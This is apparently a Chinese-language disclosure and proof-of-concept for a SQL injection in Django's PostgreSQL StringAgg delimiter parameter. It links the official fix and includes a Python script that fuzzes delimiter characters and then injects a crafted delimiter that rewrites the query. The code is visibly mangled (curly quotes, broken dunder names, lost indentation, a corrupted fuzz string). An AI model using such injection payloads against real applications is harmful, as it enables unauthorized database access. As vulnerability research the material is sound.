漏洞原因

漏洞的核心是 StringAgg 聚合函数的 delimiter 参数存在 SQL 注入漏洞

官方修复
https://github.com/django/django/commit/eb31d845323618d688ad429479c6dda973056136

poc如下：

encoding:utf-8

import os
import django
os.environ.setdefault(“DJANGO_SETTINGS_MODULE”, “sqlvul_project.settings”)

Django 版本大于等于1.7的时候，需要加上下面两句

if django.VERSION >= (1, 7):#自动判断版本
django.setup()
from vul_app.models import Info
from django.contrib.postgres.aggregates import StringAgg
from django.db.models import Count
“”"
postgres 预先执行的SQL
CREATE DATABASE test;
\c test;
\d 列出当前数据库的所有表格
“”"
def initdb():
data = [(‘li’,‘male’),(‘zhao’,‘male’),(‘zhang’,‘female’)]
for name,gender in data:
Info.objects.get_or_create(name=name,gender=gender)
def query():
# FUZZ delimiter
error_c = []
other_error_c = []
for c in "[email protected]#$%^&()_+=-|\"’:;?/>.<,{}[]":
results = Info.objects.all().values(‘gender’).annotate(mydefinedname=StringAgg(‘name’,delimiter=c))
try:
for e in results:
pass
except IndexError:
error_c.append©
except:
other_error_c.append©
print(error_c)
print(other_error_c)
def query_with_evil():
‘’’
注入点证明
分别设置delimiter为 单引号 二个单引号 二个双引号
尝试注释后面的内容 ‘)–
:return:
‘’’
print("[+]正常的输出：")
payload = ‘-’
results = Info.objects.all().values(‘gender’).annotate(mydefinedname=StringAgg(‘name’, delimiter=payload))
for e in results:
print(e)
print("[+]注入后的的输出：")
payload = ‘-’) AS “mydefinedname” FROM “vul_app_info” GROUP BY “vul_app_info”.“gender” LIMIT 1 OFFSET 1 – ’
results = Info.objects.all().values(‘gender’).annotate(mydefinedname=StringAgg(‘name’, delimiter=payload))
for e in results:
print(e)
if name == ‘main’:
print(django.VERSION) # 测试版本 3.0.2
initdb()
query()
query_with_evil()